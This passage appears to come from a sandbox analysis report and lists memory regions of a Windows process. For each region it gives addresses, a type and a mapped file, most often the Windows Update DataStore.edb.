end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 2900 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2901 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 2902 start_va = 0x2b00000 end_va = 0x2b8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 2903 start_va = 0x2b90000 end_va = 0x2b9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b90000" filename = "" Region: id = 2904 start_va = 0x2ba0000 end_va = 0x2baffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ba0000" filename = "" Region: id = 2905 start_va = 0x2bb0000 end_va = 0x2bbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bb0000" filename = "" Region: id = 2906 start_va = 0x2bc0000 end_va = 0x2bcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bc0000" filename = "" Region: id = 2907 start_va = 0x2bd0000 end_va = 0x2bdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bd0000" filename = "" Region: id = 2908 start_va = 0x2be0000 end_va = 0x2beffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002be0000" filename = "" Region: id = 2909 start_va = 0x2bf0000 end_va = 0x2bf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bf0000" filename = "" Region: id = 2910 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 2911 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 2912 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 2913 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 2914 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2915 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 2916 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 2917 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 2918 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 2919 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 2920 start_va = 0x3600000 end_va = 0x367ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2921 start_va = 0x3680000 end_va = 0x36cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003680000" filename = "" Region: id = 2922 start_va = 0x36d0000 end_va = 0x36d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036d0000" filename = "" Region: id = 2923 start_va = 0x36e0000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 2924 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 2925 start_va = 0x3800000 end_va = 0x387ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 2926 start_va = 0x3880000 end_va = 0x38cdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 2927 start_va = 0x38d0000 end_va = 0x38d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038d0000" filename = "" Region: id = 2928 start_va = 0x38e0000 end_va = 0x39dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038e0000" filename = "" Region: id = 2929 start_va = 0x39e0000 end_va = 0x3adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039e0000" filename = "" Region: id = 2930 start_va = 0x3ae0000 end_va = 0x3bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ae0000" filename = "" Region: id = 2931 start_va = 0x3be0000 end_va = 0x3c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 2932 start_va = 0x3c60000 end_va = 0x3cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c60000" filename = "" Region: id = 2933 start_va = 0x3ce0000 end_va = 0x3ceffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2934 start_va = 0x3cf0000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 2935 start_va = 0x3d00000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 2936 start_va = 0x3e00000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 2937 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 2938 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 2939 start_va = 0x4100000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 2940 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 2941 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 2942 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2943 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 2944 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 2945 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 2946 start_va = 0x4800000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2947 start_va = 0x4880000 end_va = 0x488ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 2948 start_va = 0x4890000 end_va = 0x489ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 2949 start_va = 0x48a0000 end_va = 0x48affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048a0000" filename = "" Region: id = 2950 start_va = 0x48b0000 end_va = 0x48bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 2951 start_va = 0x48c0000 end_va = 0x48cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2952 start_va = 0x48d0000 end_va = 0x48d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 2953 start_va = 0x48e0000 end_va = 0x48e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048e0000" filename = "" Region: id = 2954 start_va = 0x48f0000 end_va = 0x48fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2955 start_va = 0x4900000 end_va = 0x490ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2956 start_va = 0x4910000 end_va = 0x491ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2957 start_va = 0x4920000 end_va = 0x492ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2958 start_va = 0x4930000 end_va = 0x493ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2959 start_va = 0x4940000 end_va = 0x494ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2960 start_va = 0x4950000 end_va = 0x495ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2961 start_va = 0x4960000 end_va = 0x496ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2962 start_va = 0x4970000 end_va = 0x497ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2963 start_va = 0x4980000 end_va = 0x498ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2964 start_va = 0x4990000 end_va = 0x499ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2965 start_va = 0x49a0000 end_va = 0x49affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2966 start_va = 0x49b0000 end_va = 0x49bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2967 start_va = 0x49c0000 end_va = 0x49cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2968 start_va = 0x49d0000 end_va = 0x49dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2969 start_va = 0x49e0000 end_va = 0x49effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2970 start_va = 0x49f0000 end_va = 0x49f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 2971 start_va = 0x4a00000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 2972 start_va = 0x4b00000 end_va = 0x4b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 2973 start_va = 0x4b80000 end_va = 0x4b8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2974 start_va = 0x4b90000 end_va = 0x4b93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 2975 start_va = 0x4ba0000 end_va = 0x4baffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2976 start_va = 0x4bb0000 end_va = 0x4bbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2977 start_va = 0x4bc0000 end_va = 0x4bcffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2978 start_va = 0x4bd0000 end_va = 0x4bd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 2979 start_va = 0x4be0000 end_va = 0x4beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004be0000" filename = "" Region: id = 2980 start_va = 0x4bf0000 end_va = 0x4bfffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2981 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 2982 start_va = 0x4d00000 end_va = 0x4d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 2983 start_va = 0x4d80000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d80000" filename = "" Region: id = 2984 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 2985 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 2986 start_va = 0x5000000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 2987 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005080000" filename = "" Region: id = 2988 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005090000" filename = "" Region: id = 2989 start_va = 0x50a0000 end_va = 0x50affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050a0000" filename = "" Region: id = 2990 start_va = 0x50b0000 end_va = 0x50bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050b0000" filename = "" Region: id = 2991 start_va = 0x50c0000 end_va = 0x50cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050c0000" filename = "" Region: id = 2992 start_va = 0x50d0000 end_va = 0x50dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050d0000" filename = "" Region: id = 2993 start_va = 0x50e0000 end_va = 0x50effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2994 start_va = 0x50f0000 end_va = 0x50fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2995 start_va = 0x5100000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 2996 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 2997 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 2998 start_va = 0x5400000 end_va = 0x540ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2999 start_va = 0x5410000 end_va = 0x541ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3000 start_va = 0x5420000 end_va = 0x542ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3001 start_va = 0x5430000 end_va = 0x543ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3002 start_va = 0x5440000 end_va = 0x544ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3003 start_va = 0x5450000 end_va = 0x545ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3004 start_va = 0x5460000 end_va = 0x54dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005460000" filename = "" Region: id = 3005 start_va = 0x54e0000 end_va = 0x54effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3006 start_va = 0x54f0000 end_va = 0x55effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054f0000" filename = "" Region: id = 3007 start_va = 0x55f0000 end_va = 0x55f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055f0000" filename = "" Region: id = 3008 start_va = 0x5600000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 3009 start_va = 0x5700000 end_va = 0x57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 3010 start_va = 0x5800000 end_va = 0x587ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 3011 start_va = 0x5880000 end_va = 0x597ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005880000" filename = "" Region: id = 3012 start_va = 0x5980000 end_va = 0x598ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3013 start_va = 0x5990000 end_va = 0x599ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3014 start_va = 0x59a0000 end_va = 0x59affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3015 start_va = 0x59b0000 end_va = 0x59bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3016 start_va = 0x59c0000 end_va = 0x59cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3017 start_va = 0x59d0000 end_va = 0x59dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3018 start_va = 0x59e0000 end_va = 0x59effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3019 start_va = 0x59f0000 end_va = 0x59fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3020 start_va = 0x5a00000 end_va = 0x5a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 3021 start_va = 0x5a80000 end_va = 0x5a8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3022 start_va = 0x5a90000 end_va = 0x5a9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3023 start_va = 0x5aa0000 end_va = 0x5aaffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3024 start_va = 0x5ab0000 end_va = 0x5abffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3025 start_va = 0x5ac0000 end_va = 0x5acffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3026 start_va = 0x5ad0000 end_va = 0x5adffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3027 start_va = 0x5ae0000 end_va = 0x5aeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3028 start_va = 0x5af0000 end_va = 0x5afffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3029 start_va = 0x5b00000 end_va = 0x5b0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3030 start_va = 0x5b10000 end_va = 0x5b1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3031 start_va = 0x5b20000 end_va = 0x5b2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3032 start_va = 0x5b30000 end_va = 0x5b3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3033 start_va = 0x5b40000 end_va = 0x5b4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3034 start_va = 0x5b50000 end_va = 0x5b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3035 start_va = 0x5b60000 end_va = 0x5b6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3036 start_va = 0x5b70000 end_va = 0x5b7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3037 start_va = 0x5b80000 end_va = 0x5c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b80000" filename = "" Region: id = 3038 start_va = 0x5c80000 end_va = 0x5d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c80000" filename = "" Region: id = 3039 start_va = 0x5d90000 end_va = 0x5d91fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d90000" filename = "" Region: id = 3040 start_va = 0x5db0000 end_va = 0x5dfefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005db0000" filename = "" Region: id = 3041 start_va = 0x5e80000 end_va = 0x5f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e80000" filename = "" Region: id = 3042 start_va = 0x5f80000 end_va = 0x607ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f80000" filename = "" Region: id = 3043 start_va = 0x6080000 end_va = 0x617ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 3044 start_va = 0x6180000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006180000" filename = "" Region: id = 3045 start_va = 0x6280000 end_va = 0x628ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: 